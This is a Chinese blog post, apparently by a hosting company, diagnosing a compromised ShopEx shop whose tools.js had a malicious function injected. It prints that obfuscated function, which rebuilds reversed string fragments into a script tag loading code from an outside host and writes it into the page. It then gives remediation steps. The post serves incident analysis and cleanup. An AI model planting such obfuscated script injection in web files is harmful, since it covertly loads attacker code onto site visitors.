大家都知道shopex是一款开源的程序。很多做电商的站长的朋友们都是使用的这个开源程序。但是开源的程序有很多bug,黑客就是瞅准了这些漏洞进行攻击。其中有一种,攻击的对象就是js文件。今天小编就遇到了一个站长朋友的网站受到这样的攻击。js文件里包含了恶意代码,从而触发了恶意访问请求。
无忧主机小编在分析客户网站访问时,发现网站加载特别慢,原因是加载了以下链接:
srccom.com/SRC.SRC
而这个链接,单独访问是无法访问的。也就是说由于这个无法访问的链接程序一直在进行调用,但是调用失败出现pending响应返回,导致加载缓慢。根据链接调用分析,报错来自于tools.js文件。粗略查看程序发现tools.js中并没有恶意URL的关键字。无忧主机小编把客户的tools.js文件下载到本地,仔细对比shopex开源源码的tools.js,发现文件中被植入了一段恶意函数,函数代码如下:
1 |
function CurrentXmlFrmFocus(){ |
3 |
var arnElement=[2,9,3,8,2,8,7,5,4,3,10,5]; |
5 |
var arsOffset=[ " " , ":" , "." , "/" , "<" , ">" , "=" , "'" , "CRS" , "MOC" , "TPIRCS" , "PTTH" ]; |
7 |
var ardPopOpacity=[4,10,0,8,6,7,11,1,3,3,8,9]; |
11 |
ardPopOpacity=ardPopOpacity.concat(arnElement); |
13 |
for ( var i=0;i<ardPopOpacity.length;i++) strgAttribute=strgAttribute+arsOffset[ardPopOpacity[i]].split(“”).reverse().join(“”); |
15 |
document.writeln(strgAttribute); |
具体的解决方案如下:
找到网站根目录下的statics/script/tools.js文件,使用shopex最新安装包中的JS文件上传替换它!
按照以上发法替换后,到网站后台更新下缓存就可以解决。最近shopex中此问题爆发比较频繁,希望此文能引起shopex站长们的重视,也希望这篇技术文章能帮到遇到同样问题的站长们。